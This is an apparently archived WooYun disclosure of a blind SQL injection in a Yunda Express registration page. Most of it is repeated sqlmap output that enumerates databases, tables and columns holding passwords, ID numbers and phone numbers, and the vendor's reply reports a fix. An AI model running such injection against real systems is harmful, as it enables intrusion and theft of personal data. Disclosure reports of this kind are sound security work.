[公开漏洞]韵达快递某系统sql注射导致个人隐私泄露
-
来源:WooYun 浏览:556次 时间:2014-06-27
2014-05-13:细节已通知厂商并且等待厂商处理中
2014-05-13:厂商已经确认,细节仅向厂商公开
2014-05-23:细节向核心白帽子及相关领域专家公开
2014-06-02:细节向普通白帽子公开
2014-06-12:细节向实习白帽子公开
2014-06-27:细节向公众公开
上次一美女约我去一风景区爬山,尼玛山还没爬呢,在山脚还没迈一步就说太高了嫌累,要在山底找个酒店歇息。歇NMLGB,娇生惯养。我说你爬不爬,你不爬我爬,于是我丢掉她一个人迅速地登上了山顶,这才解气。
详细说明:注射链接:
http://nbsw.yundasys.com:11324/ztb/register.php
各种post注射
直接抓包丢sqlmap跑了
库
current database: 'jb'
[00:45:03] [INFO] fetching database names
[00:45:03] [INFO] fetching number of databases
[00:45:03] [INFO] resumed: 3
[00:45:03] [INFO] resumed: information_schema
[00:45:03] [INFO] resumed: jb
[00:45:03] [INFO] resumed: ydserver
available databases [3]:
[*] information_schema
[*] jb
[*] ydserver
当前库 jb~~~ 好有趣的库名,我想多了!
表
Database: jb
[9 tables]
+---------+
| sq\?81b |
| anpai |
| biaoan |
| gys |
| mail |
| message |
| rizhi |
| sms |
| xiangmu |
+---------+
找个表跑一下列
Database: jb
Table: gys
[33 columns]
+-----------+------------------+
| Column | Type |
+-----------+------------------+
| active | tinyint(2) |
| bq | varchar(20) |
| dhhm | varchar(50) |
| emailed | tinyint(2) |
| fax | varchar(50) |
| gsfr | varchar(18) |
| gsgm | varchar(20) |
| gsmc | varchar(50) |
| gsxz | tinyint(2) |
| gszch | varchar(A0) |
| gszcrq | date |
| gydz |
| gyslx | tinyint(2) |
| id | int(10) unsigned |
| jyfw | varchar(50) |
| khyh | varchar(100) |
| khzh | varchar(50) |
| khzhmc | varchar(50) |
| role | tinyint(1) |
| sfzh | varchar(18) |
| sfzsmj | varchar(100) |
| sndxse | varchar(18) |
| swdj | varchar(100) |
| temp_yhmm | varchar(32) |
| temp_yhzh | varchar(18) |
| xgrq | datetime |
| yhbm | int(18) |
| yhxm | varchar(18) |
| yjdz | varchar(50) |
| yyzz | varchar(100) |
| zcrq | timestamp |
| zczj | varchar(18) |
| zzdmz | varchar(100) |
+-----------+------------------+
通过抓包,我已经得出这些表对应的内容
主要内容这几个
yhzh-账号
yhmm-密码
yhxm-姓名
sfzh-身份证号码
lxdh-手机号码
虽然是盲注,慢了点,但是还是能跑出来的!
个人姓名,身份证号码,电话这些容易泄露被利用!
没什么好说的,赶快修复吧
库
current database: 'jb'
[00:45:03] [INFO] fetching database names
[00:45:03] [INFO] fetching number of databases
[00:45:03] [INFO] resumed: 3
[00:45:03] [INFO] resumed: information_schema
[00:45:03] [INFO] resumed: jb
[00:45:03] [INFO] resumed: ydserver
available databases [3]:
[*] information_schema
[*] jb
[*] ydserver
表
Database: jb
[9 tables]
+---------+
| sq\?81b |
| anpai |
| biaoan |
| gys |
| mail |
| message |
| rizhi |
| sms |
| xiangmu |
+---------+
找个表跑一下列
Database: jb
Table: gys
[33 columns]
+-----------+------------------+
| Column | Type |
+-----------+------------------+
| active | tinyint(2) |
| bq | varchar(20) |
| dhhm | varchar(50) |
| emailed | tinyint(2) |
| fax | varchar(50) |
| gsfr | varchar(18) |
| gsgm | varchar(20) |
| gsmc | varchar(50) |
| gsxz | tinyint(2) |
| gszch | varchar(A0) |
| gszcrq | date |
| gydz |
| gyslx | tinyint(2) |
| id | int(10) unsigned |
| jyfw | varchar(50) |
| khyh | varchar(100) |
| khzh | varchar(50) |
| khzhmc | varchar(50) |
| role | tinyint(1) |
| sfzh | varchar(18) |
| sfzsmj | varchar(100) |
| sndxse | varchar(18) |
| swdj | varchar(100) |
| temp_yhmm | varchar(32) |
| temp_yhzh | varchar(18) |
| xgrq | datetime |
| yhbm | int(18) |
| yhxm | varchar(18) |
| yjdz | varchar(50) |
| yyzz | varchar(100) |
| zcrq | timestamp |
| zczj | varchar(18) |
| zzdmz | varchar(100) |
+-----------+------------------+
你们懂的~~
版权声明:转载请注明来源 卡卡@乌云 漏洞回应 厂商回应:危害等级:高
漏洞Rank:15
确认时间:2014-05-13 11:08
厂商回复:我们立即修复,感谢提醒!
最新状态:2014-05-13:已修复.